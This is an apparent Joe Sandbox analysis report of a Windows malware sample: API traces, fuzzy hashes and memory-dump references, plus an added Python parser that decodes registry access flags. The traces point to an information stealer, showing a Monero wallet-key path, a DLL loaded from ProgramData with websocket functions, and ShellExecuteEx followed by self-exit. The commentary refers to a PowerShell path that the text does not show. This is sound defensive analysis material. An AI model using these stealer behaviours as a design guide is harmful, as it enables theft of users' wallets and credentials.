                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: b11fbea27fb687dacc23cd97f084747cd379d876fc95c24164d0c590d9ca371f
                                  • Instruction ID: a16351b79439c869598c0670a7910005a0ca0c0c1128a5e130d62f98dc432fcd
                                  • Opcode Fuzzy Hash: b11fbea27fb687dacc23cd97f084747cd379d876fc95c24164d0c590d9ca371f
                                  • Instruction Fuzzy Hash: 2841ADB6900108ABDB28E7A0EC46FEE737CB748300F048569B72A561C5EB7557C8CBE1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                  • String ID:
                                  • API String ID: 3136044242-0
                                  • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction ID: c256d885955f6b0382b6729dc3e2f1ab86a4c79e8fde9914f50c239f71d89984
                                  • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction Fuzzy Hash: D821A372D1061AAFDB229E15CC4197FBAA9EB817D8F256117FA0877310D3304D43DBA0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77FC7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E77FCE
                                  • RegOpenKeyExA.ADVAPI32(80000002,0172B990,00000000,00020119,?), ref: 00E77FEE
                                  • RegQueryValueExA.ADVAPI32(?,0173D660,00000000,00000000,000000FF,000000FF), ref: 00E7800F
                                  • RegCloseKey.ADVAPI32(?), ref: 00E78022
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: d70daa425f0bd456f3ea637ef48f8ffacb43f9ab7627a1e2e47bc4c512a342a7
                                  • Instruction ID: 6f525e259b698adce4029c3e112efa4be56431444b996091d27a4fca3b3eb6d7
                                  • Opcode Fuzzy Hash: d70daa425f0bd456f3ea637ef48f8ffacb43f9ab7627a1e2e47bc4c512a342a7
                                  • Instruction Fuzzy Hash: E31191B1A84205EBE718CF84DD49FBFB7B8EB04B10F104129F629B7288D7B55944CBA1
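The report prints registry arguments as raw hex: the function above opens hive 80000002 with access 00020119, the one before it hive 80000001 with the same mask. The parser below is an added example of mine, not code from the Joe Sandbox report or from the sample; it reads these "APIs" trace lines and names the hive and access mask using the Win32 constants from winreg.h / winnt.h. The lines in TRACE_LINES are copied from the traces in this report. One detail worth seeing decoded: 0x20119 is KEY_READ | KEY_WOW64_64KEY, so the process asks for the 64-bit registry view explicitly, which is consistent with a 32-bit binary (32-bit addresses throughout, SysWOW64 PowerShell path above) fingerprinting the host.

```python
"""
Added example (not from the report): parse the per-function "APIs" trace lines
that Joe Sandbox prints and decode RegOpenKeyEx arguments into hive and rights
names. Constants are the Win32 values; TRACE_LINES is copied from this report.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Copied from the function traces in this report (one wsprintfA line without
# an argument list, one "Part of subcall" line, the rest plain calls).
TRACE_LINES = """
• RegOpenKeyExA.ADVAPI32(80000001,0173D420,00000000,00020119,?), ref: 00E74344
• RegQueryValueExA.ADVAPI32(?,0173DF30,00000000,00000000,00000000,000000FF), ref: 00E74368
• RegCloseKey.ADVAPI32(?), ref: 00E74372
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77FC7
• RegOpenKeyExA.ADVAPI32(80000002,0172B990,00000000,00020119,?), ref: 00E77FEE
• wsprintfA.USER32 ref: 00E79457
  • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
"""

_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

PREDEFINED_HKEYS: Dict[int, str] = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

# Composite rights are matched first so KEY_READ reports as one name; the
# remaining bits (e.g. the WOW64 view flags) are then listed individually.
_COMPOSITE_RIGHTS = [(0xF003F, "KEY_ALL_ACCESS"), (0x20019, "KEY_READ"), (0x20006, "KEY_WRITE")]
_SINGLE_RIGHTS = [
    (0x0001, "KEY_QUERY_VALUE"), (0x0002, "KEY_SET_VALUE"), (0x0004, "KEY_CREATE_SUB_KEY"),
    (0x0008, "KEY_ENUMERATE_SUB_KEYS"), (0x0010, "KEY_NOTIFY"), (0x0020, "KEY_CREATE_LINK"),
    (0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY"),
    (0x10000, "DELETE"), (0x20000, "READ_CONTROL"), (0x40000, "WRITE_DAC"),
    (0x80000, "WRITE_OWNER"), (0x100000, "SYNCHRONIZE"),
]


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int] = None
    decoded: Dict[str, str] = field(default_factory=dict)


def decode_key_access(mask: int) -> List[str]:
    """Expand a samDesired value into KEY_* and standard-rights names."""
    names: List[str] = []
    for bits, name in _COMPOSITE_RIGHTS:
        if mask & bits == bits:
            names.append(name)
            mask &= ~bits
    for bit, name in _SINGLE_RIGHTS:
        if mask & bit:
            names.append(name)
            mask &= ~bit
    if mask:
        names.append(f"UNKNOWN(0x{mask:X})")
    return names


def _annotate_registry(call: ApiCall) -> None:
    """Name hive and rights on RegOpenKeyEx; '?' is the sandbox's unresolved marker."""
    if call.api not in ("RegOpenKeyExA", "RegOpenKeyExW") or len(call.args) < 4:
        return
    hkey, _subkey, _opts, sam = call.args[:4]
    if hkey != "?":
        call.decoded["hKey"] = PREDEFINED_HKEYS.get(int(hkey, 16), f"handle 0x{int(hkey, 16):X}")
    if sam != "?":
        call.decoded["samDesired"] = "|".join(decode_key_access(int(sam, 16)))


def parse_trace(text: str) -> List[ApiCall]:
    """Parse every trace line; blank or non-matching lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args is not None else []
        call = ApiCall(
            api=m.group("api"), module=m.group("module"), args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        )
        _annotate_registry(call)
        calls.append(call)
    return calls


def registry_opens(calls: List[ApiCall]) -> List[str]:
    """One summary line per RegOpenKeyEx call: hive, rights, call site."""
    return [
        f"{c.decoded.get('hKey', '?')} {c.decoded.get('samDesired', '?')} @ {c.ref:08X}"
        for c in calls if c.api.startswith("RegOpenKeyEx")
    ]


if __name__ == "__main__":
    for line in registry_opens(parse_trace(TRACE_LINES)):
        print(line)
```

The subkey and value-name arguments (0173D420, 0173DF30 and so on) are pointers into the unpacked image, so they stay opaque here; resolving them means reading the strings at those addresses out of the .sdmp dump listed as the source file for the function.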
                                  APIs
                                  • StrStrA.SHLWAPI(0173DDE0,00000000,00000000,?,00E69F71,00000000,0173DDE0,00000000), ref: 00E793FC
                                  • lstrcpyn.KERNEL32(01137580,0173DDE0,0173DDE0,?,00E69F71,00000000,0173DDE0), ref: 00E79420
                                  • lstrlen.KERNEL32(00000000,?,00E69F71,00000000,0173DDE0), ref: 00E79437
                                  • wsprintfA.USER32 ref: 00E79457
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 3251d4ac02b9da80f434318985a3d9dc7f852b587b9b4b04b62ff6d6e342ecc7
                                  • Instruction ID: 96d7db9892f0a42c1ff75cca61f84102c5176d04fe49de56d320c2e4859f91c4
                                  • Opcode Fuzzy Hash: 3251d4ac02b9da80f434318985a3d9dc7f852b587b9b4b04b62ff6d6e342ecc7
                                  • Instruction Fuzzy Hash: 2301D2B660024CFFCB18DF98C984EAE7BB9EF44304F108258F91D97289D731AA54DB90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E612B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E612BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E612D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E612F5
                                  • RegCloseKey.ADVAPI32(?), ref: 00E612FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 32d5f448155507046058431973f5df7334fb86d6b1eca8d1a963e6a41ad5304c
                                  • Instruction ID: 5e80451185701c8ed30dec503df97a0313621051aa3e81ae91b9272da7a3606b
                                  • Opcode Fuzzy Hash: 32d5f448155507046058431973f5df7334fb86d6b1eca8d1a963e6a41ad5304c
                                  • Instruction Fuzzy Hash: B001E1B9A40209BFDB14DFD4DC49FAE77B9EB48701F1081A5FA15972C8D7709A40DB90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 5c0beeea5281928889c9d9419dfad96b389cadaaf404bcbd660c8b888be637c2
                                  • Instruction ID: d2fada7956fd9f4946093061e081844698a8ea4b57b3ae578b0b3885f52e7bed
                                  • Opcode Fuzzy Hash: 5c0beeea5281928889c9d9419dfad96b389cadaaf404bcbd660c8b888be637c2
                                  • Instruction Fuzzy Hash: 2341E97110475C5EDB328B248D85FFBBBFC9B45708F2494ECE98EA6142D2719A44DF60
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E76903
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E769C6
                                  • ExitProcess.KERNEL32 ref: 00E769F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 462aa22e21c6603b4121a640effc26fc33e0a0cffbcfeaff31bc5bd95a2b86a1
                                  • Instruction ID: 5fae1d4d9299154dbf6e069b84eb67579d7d8ad33b885cc9e1123b7d670e0bc5
                                  • Opcode Fuzzy Hash: 462aa22e21c6603b4121a640effc26fc33e0a0cffbcfeaff31bc5bd95a2b86a1
                                  • Instruction Fuzzy Hash: 7A3150F1901218ABDB18EB90DD95FDDB7B8AF54300F4091A8F21976185DF706B88CF65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E80E10,00000000,?), ref: 00E789BF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E789C6
                                  • wsprintfA.USER32 ref: 00E789E0
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: dbf6cc70a43e8b09f3918528b9736f8e268085b8f9695b1ebc5b36dd55b2346a
                                  • Instruction ID: 2e55676b8746cde5d61707afbb4587d8944836129a4760f54531aab1f06ddf81
                                  • Opcode Fuzzy Hash: dbf6cc70a43e8b09f3918528b9736f8e268085b8f9695b1ebc5b36dd55b2346a
                                  • Instruction Fuzzy Hash: 2F212EB1A44204AFDB14DF94DD45FAEBBB8FB48710F108529FA19B72C8C7755940CBA0
                                  APIs
                                  • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E6A098
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                  • API String ID: 1029625771-1545816527
                                  • Opcode ID: a5250cb04553578ae89b4c7fd84d4a1bc320f3abf882112faa9e9352a8b8ca35
                                  • Instruction ID: 2e404eca576058fa22677e85ae41f4e63cb30b544f00fb2b89bd82fba61ce850
                                  • Opcode Fuzzy Hash: a5250cb04553578ae89b4c7fd84d4a1bc320f3abf882112faa9e9352a8b8ca35
                                  • Instruction Fuzzy Hash: 63F062F8985304AFDB38BB60E988B61B258A307740F002578E019B71CCC6B498C4DB12
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E796AE,00000000), ref: 00E78EEB
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E78EF2
                                  • wsprintfW.USER32 ref: 00E78F08
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
